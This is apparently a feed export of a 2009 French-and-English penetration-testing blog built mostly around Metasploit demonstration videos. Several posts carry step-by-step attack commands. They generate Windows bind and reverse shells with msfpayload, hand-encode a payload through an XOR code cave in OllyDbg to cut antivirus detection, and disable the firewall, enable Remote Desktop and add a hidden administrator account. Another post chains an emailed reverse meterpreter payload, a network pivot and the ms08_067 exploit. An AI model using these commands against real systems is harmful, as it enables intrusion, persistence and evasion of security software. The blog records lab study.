tag:blogger.com,1999:blog-85524517151321656582011-07-08T18:27:36.013+02:00Learning and testingne0matrixhttp://www.blogger.com/profile/01064235721144009241noreply@blogger.comBlogger141100tag:blogger.com,1999:blog-8552451715132165658.post-89862120277349454182009-06-14T18:25:00.001+02:002009-06-14T18:26:22.692+02:00<embed src="http://blip.tv/play/AYGJskCN92g" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"></embed><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-8986212027734945418?l=ne0matrix.blogspot.com' alt='' /></div>ne0matrixnoreply@blogger.com4tag:blogger.com,1999:blog-8552451715132165658.post-83303907403955603752009-05-23T14:18:00.006+02:002009-05-23T15:07:18.133+02:00<embed src="http://blip.tv/play/AYGD8VyN92g" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"></embed> <br />This plugin provides an msf daemon interface that spawns a listener on a <br />defined port (default 55554) and gives each connecting client its own <br />console interface. These consoles all share the same framework instance. <br /><br />link:<br />http://trac.metasploit.com/browser/framework3/trunk/plugins/msfd.rb<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-8330390740395560375?l=ne0matrix.blogspot.com' alt='' /></div>ne0matrixnoreply@blogger.com0tag:blogger.com,1999:blog-8552451715132165658.post-52815827951276981952009-05-22T17:48:00.012+02:002009-05-23T14:34:57.129+02:00<embed src="http://blip.tv/play/AYGD8GSN92g" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"></embed> <br /><br />Utility that opens the Metasploit framework for remote access. Basically turns the framework on the local machine into a server for remote machines.<br /><br /><span style="color:#0099ff;">Location: </span><br />/pentest/exploit/framework3<br /><br /><span style="color:#0099ff;">Usage: </span><br />./msfd -a <listening_ip_address> -d -p <listening_port><br /><br /><span style="color:#0099ff;">Example: </span><br />./msfd -a 192.168.1.100 -d -p 4444<br />[*] Initializing msfd...<br />[*] Running msfd...<br /><br /><span style="color:#0099ff;">links:</span><br />https://wiki.remote-exploit.org/backtrack/wiki/msfd<br />http://trac.metasploit.com/browser/framework3/trunk/msfd<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-5281582795127698195?l=ne0matrix.blogspot.com' alt='' /></div>ne0matrixnoreply@blogger.com0tag:blogger.com,1999:blog-8552451715132165658.post-79744370577293582472009-05-21T21:53:00.001+02:002009-05-21T21:53:47.546+02:00<embed src="http://blip.tv/play/AYGDuUON92g" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"></embed><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-7974437057729358247?l=ne0matrix.blogspot.com' alt='' /></div>ne0matrixnoreply@blogger.com0tag:blogger.com,1999:blog-8552451715132165658.post-81705363502022675532009-05-16T23:53:00.009+02:002009-05-17T10:23:19.869+02:00Fichier encodedbindtcpx.exe reçu le 2009.05.16 23:23:28 (CET)Situation actuelle: terminé<br />Résultat: 6/40 (15.00%)<br /><br /><a href="http://www.virustotal.com/fr/analisis/2dcd8d8636d7aae5dd1ae629abcca482">http://www.virustotal.com/fr/analisis/2dcd8d8636d7aae5dd1ae629abcca482</a><br /><br /><br /><embed src="http://blip.tv/play/AYGClQiN92g" width="400" height="300" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true"></embed><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-8170536350202267553?l=ne0matrix.blogspot.com' alt='' /></div>ne0matrixnoreply@blogger.com1tag:blogger.com,1999:blog-8552451715132165658.post-11471016986129970482009-05-15T20:46:00.017+02:002009-05-17T00:03:09.453+02:00./msfpayload windows/shell_bind_tcp LPORT=55555 X > ***.exe<br /><br />Fichier bindtcpx.exe reçu le 2009.05.15 20:33:46 (CET)<br />Situation actuelle: terminé<br /><span style="color:#0099ff;">Résultat: 12/40 (30.00%)</span><br /><a href="http://www.virustotal.com/fr/analisis/86902b47b990be990c8dbccfd2628e49">http://www.virustotal.com/fr/analisis/86902b47b990be990c8dbccfd2628e49</a><br /><br />--------------------------<br />Execution flow hijack ==> XOR encryption<br /><br />Fichier bindtcpx1.exe reçu le 2009.05.15 20:35:25 (CET)<br />Situation actuelle: terminé<br /><span style="color:#0099ff;">Résultat: 8/40 (20.00%)</span><br /><a href="http://www.virustotal.com/fr/analisis/768667c427ae3001c11dff126c54f231">http://www.virustotal.com/fr/analisis/768667c427ae3001c11dff126c54f231</a><br /><br />--------------------------<br />./msfpayload windows/shell_bind_tcp LPORT=55555 R msfencode -b '' -t exe -o ***.exe<br /><br />Fichier encodedbindtcp.exe reçu le 2009.05.16 23:33:49 (CET)Situation actuelle: terminé<br /><span style="color:#0099ff;">Résultat: 10/40 (25.00%)</span><br /><span style="color:#0099ff;"><a href="http://www.virustotal.com/fr/analisis/4a7e5c372c5292c0a56799ad75b10b3e">http://www.virustotal.com/fr/analisis/4a7e5c372c5292c0a56799ad75b10b3e</a></span><br /><br /><br /><span style="color:#0099ff;"></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-1147101698612997048?l=ne0matrix.blogspot.com' alt='' /></div>ne0matrixnoreply@blogger.com0tag:blogger.com,1999:blog-8552451715132165658.post-23580590767768083392009-05-15T18:02:00.034+02:002009-05-16T08:57:21.568+02:00<embed src="http://blip.tv/play/AYGB+yqN92g" width="400" height="300" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true"></embed><br /><br />***Based on the shmoocon demo made by Muts***<br /><br /><span style="color:#0099ff;">Backtrack:</span><br />msfpayload windows/shell_bind_tcp LPORT=55555 X > bindtcp.exe<br /><br /><span style="color:#0099ff;">Windows:</span><br />Click on the file ==> bindshell on port 55555<br />check: netstat -na find "55555"<br /><br /><br /><span style="color:#0099ff;">PEditor</span><br />.idata: vsize:500 - rsize:400<br /><br /><span style="color:#0099ff;">hexedit: </span><br />+ 200 hex bytes<br /><br /><span style="color:#0099ff;"><br />--------------<br />--OLLYdbg--<br />--------------</span><br /><span style="color:#0099ff;">first instructions:</span><br />00401000 > 31C0 XOR EAX,EAX<br /><br />00401002 68 34104000 PUSH <jmp.&kernel32.exitprocess><br />00401007 . 64:FF30 PUSH DWORD PTR FS:[EAX]<br />0040100A . 64:8920 MOV DWORD PTR FS:[EAX],ESP<br />0040100D . 6A 40 PUSH 40<br /><br /><span style="color:#0099ff;">Code cave: 00401066</span><br />start: 00401002<br />end: 00401060<br /><br /><span style="color:#0099ff;">XOR loop:<br />MOV EAX, 00401002 # Start of encoding address.<br />XOR BYTE PTR DS: [EAX], 5E # XOR the contents of EAX with the key 5E<br />INC EAX # Increase EAX<br />CMP EAX, 00401060 # Tests to see if we've reached the end of our enc<br />JLE SHORT xxx # If not, jump back to XOR command</span><br /><br /><span style="color:#0099ff;">After the loop:</span><br />XOR EAX,EAX (overwritten instructions)<br />JMP 00401002 (the address after the overwritten instructions)<br /><br /><br /><span style="color:#0099ff;">------------------<br />Commentaires<br />------------------</span><br /><br /><span style="color:#0099ff;">1- Créer un payload bind_tcp</span><br />msfpayload windows/shell_bind_tcp LPORT=55555 X > bindtcp.exe (par exemple)<br /><br /><span style="color:#0099ff;">2- Le scanner via virustotal (résultat...)</span><br /><span style="color:#0099ff;">3- Cliquer sur le payload et vérifier que le port un ouvert</span><br />netstat -na find "55555"<br /><br /><span style="color:#0099ff;">4- Exécuter le payload dans PEditor</span><br />-Modifier la section .idata<br />vsize:500 &amp; rsize:400<br />Elle doit être readable, writable et executable.<br />-Modifier la section .text (readable, Writable et executable)<br />Enregistrer<br /><br /><span style="color:#0099ff;">5- Ouvrir le payload avec Hexedit</span><br />-Ajouter 200 hex bytes<br />Puisque (initial-rsize=200, actual-rsize=400 ) 400-200 ==> 200.<br />Enregistrer<br /><br /><span style="color:#0099ff;">6- Lancer le payload via Ollydbg</span><br />-Copier les 1eres instructions dans notepad (pour repérer les instructions qui seront remplacées)<br />-Trouver un espace libre pour le "code-cave"<br />-Retouner à l'OEP(entrypoint/début), remplacer la 1ere instruction par "JMP adresse-du-code-cave"<br />-Définir/repérer l'adresse à laquelle doit commencer l'encodage<br />-Définir/repérer l'adresse à laquelle doit se terminer l'encodage, et modifier la boucle ASM avec ces adresses.<br />-Après la boucle, introduire l'instruction (les instructions) qui a été remplacée par le JMP du début.<br />-Et terminer par un 2e JMP vers l'adresse [00401002] qui suit l'instruction remplacée<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-2358059076776808339?l=ne0matrix.blogspot.com' alt='' /></div>ne0matrixnoreply@blogger.com0tag:blogger.com,1999:blog-8552451715132165658.post-90424012621630132402009-05-03T16:10:00.015+02:002009-05-03T17:42:32.255+02:00<embed src="http://blip.tv/play/Af7ee433aA" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"></embed> <br /><p><a href="http://trac.metasploit.com/browser/framework/trunk/scripts/meterpreter/scraper.rb?rev=6091">scraper.rb on metasploit [dot] com<br /></a></p><br /><p><a href="http://trac.metasploit.com/wiki/AutomatingMeterpreter">http://trac.metasploit.com/wiki/AutomatingMeterpreter</a></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-9042401262163013240?l=ne0matrix.blogspot.com' alt='' /></div>ne0matrixnoreply@blogger.com0tag:blogger.com,1999:blog-8552451715132165658.post-68230417873108489862009-05-03T14:05:00.015+02:002009-05-24T13:04:45.228+02:00<embed src="http://blip.tv/play/Af7dXo33aA" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"></embed> <br /><br /><span style="color:#0099FF;"><br />Getgui script:</span><br /><p><a href="http://trac.metasploit.com/browser/framework3/trunk/scripts/meterpreter/getgui.rb">getgui.rb</a> on metasploit<br />run getgui -h<br /></p><span style="color:#0099FF;"><br />manual config:</span><div style="width:800; height:180; overflow:auto; border:solid 1px white;"><br />Netstat –na find “3389”<br />Netsh firewall show opmode<br />netsh firewall set opmode mode=DISABLE<br />netsh firewall set opmode exception=ENABLE<br />netsh firewall set service type = remotedesktop mode = enable<br />netsh firewall set service type = remotedesktop mode = enable scope=CUSTOM 192.168.1.64</div><br /><br />reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" find "fDenyTSConnections"<br /><br />reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f<br /><br />net user morpheus thematrix /add<br />net localgroup "Utilisateurs de Bureau à distance" /add"<br />net localgroup Administrateurs morpheus /add<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-6823041787310848986?l=ne0matrix.blogspot.com' alt='' /></div>ne0matrixnoreply@blogger.com0tag:blogger.com,1999:blog-8552451715132165658.post-75875232079618790612009-05-02T22:13:00.043+02:002009-05-24T13:02:49.550+02:00<embed src="http://blip.tv/play/Af7QFI33aA" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"></embed> <br /><br />----------------------------------------------<br />network 1 (wifi)<br />R1: xx.xx.xx.xx (public IP)<br />NAT overload + static PAT (53, 69, 4444, 4445) <br />A: Laptop BT 192.168.1.8 (attacker)<br />----------------------------------------------<br />network 2 <br />R2: NAT overload (firewall)<br />B: Desktop XPsp2 192.168.1.67 (target1 - pivot)<br />C: Laptop XPsp3 192.168.1.66 (target2)<br />----------------------------------------------<span style="color:#0099FF;"><br />A ==wifi==> * R1 * ---internet--> * R2 * ==wire==> + B + ==wire==> C </span><br />----------------------------------------------<br />----------------------------------------------<span style="color:#0099FF;"><br />ATTAQUE 1 (B)</span><br />Envoi par email(par ex) d'un fichier douteux (.doc-macrovba, .pdf, .jpg, etc....) qui éxécute un payload reverse tcp.<br /><br /><div style="width:400; height:300; overflow:auto; border:solid 1px white;">msfpayload windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 X > reverse.exe<br />#pour la démonstration, on a transféré le fichier via tftp<br />msfconsole<br />use multi/handler<br />set payload windows/meterpreter/reverse_tcp<br />set LHOST 192.168.1.8<br />set LPORT 4444<br />exploit<br />#B éxécute reverse.exe ==> 1ere séssion meterpreter<br /></div><br />----------------------------------------------<span style="color:#0099FF;"><br />CONFIGURATION PIVOT sur B</span><br /><div style="width:400; height:300; overflow:auto; border:solid 1px white;">portfwd add -L 127.0.0.1 -l 4445 -r 192.168.1.66 -p 445<br />background<br />route add 192.168.1.66 255.255.255.255 1<br />#1 étant le numéro de la séssion</div><br /><br />----------------------------------------------<span style="color:#0099FF;"><br />ATTAQUE 2 (C)</span><div style="width:400; height:300; overflow:auto; border:solid 1px white;">use windows/smb/ms08_067_netapi<br />set RHOST 192.168.1.66<br />set RPORT 445<br />set payload windows/meterpreter/bind_tcp<br />set LPORT 4445<br />exploit<br />#2e séssion meterpreter</div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-7587523207961879061?l=ne0matrix.blogspot.com' alt='' /></div>ne0matrixnoreply@blogger.com4tag:blogger.com,1999:blog-8552451715132165658.post-44777263735820110682009-04-26T23:52:00.002+02:002009-04-26T23:59:03.264+02:00<embed src="http://blip.tv/play/Af2Mb433aA" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"></embed><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-4477726373582011068?l=ne0matrix.blogspot.com' alt='' /></div>ne0matrixnoreply@blogger.com0tag:blogger.com,1999:blog-8552451715132165658.post-71505240655659251122009-04-26T23:51:00.002+02:002009-04-26T23:59:48.954+02:00<embed src="http://blip.tv/play/Afz9XY33aA" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"></embed><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-7150524065565925112?l=ne0matrix.blogspot.com' alt='' /></div>ne0matrixnoreply@blogger.com3tag:blogger.com,1999:blog-8552451715132165658.post-87691374751125869492009-04-26T23:47:00.004+02:002009-04-27T00:00:26.059+02:00<embed src="http://blip.tv/play/Afz3DI33aA" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"></embed><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-8769137475112586949?l=ne0matrix.blogspot.com' alt='' /></div>ne0matrixnoreply@blogger.com0tag:blogger.com,1999:blog-8552451715132165658.post-49505512534587932772009-04-26T22:30:00.000+02:002009-04-26T22:32:32.753+02:00<span style="color:#ffffff;">COURAGE is not the ability to be fearless, but the ability to act in spite of fear.</span><br /><span style="color:#ffffff;"></span><br /><span style="color:#ffffff;">Better to fight for something than to live for nothing.</span><br /><span style="color:#ffffff;">(Gen. G.S. Patton)</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-4950551253458793277?l=ne0matrix.blogspot.com' alt='' /></div>ne0matrixnoreply@blogger.com0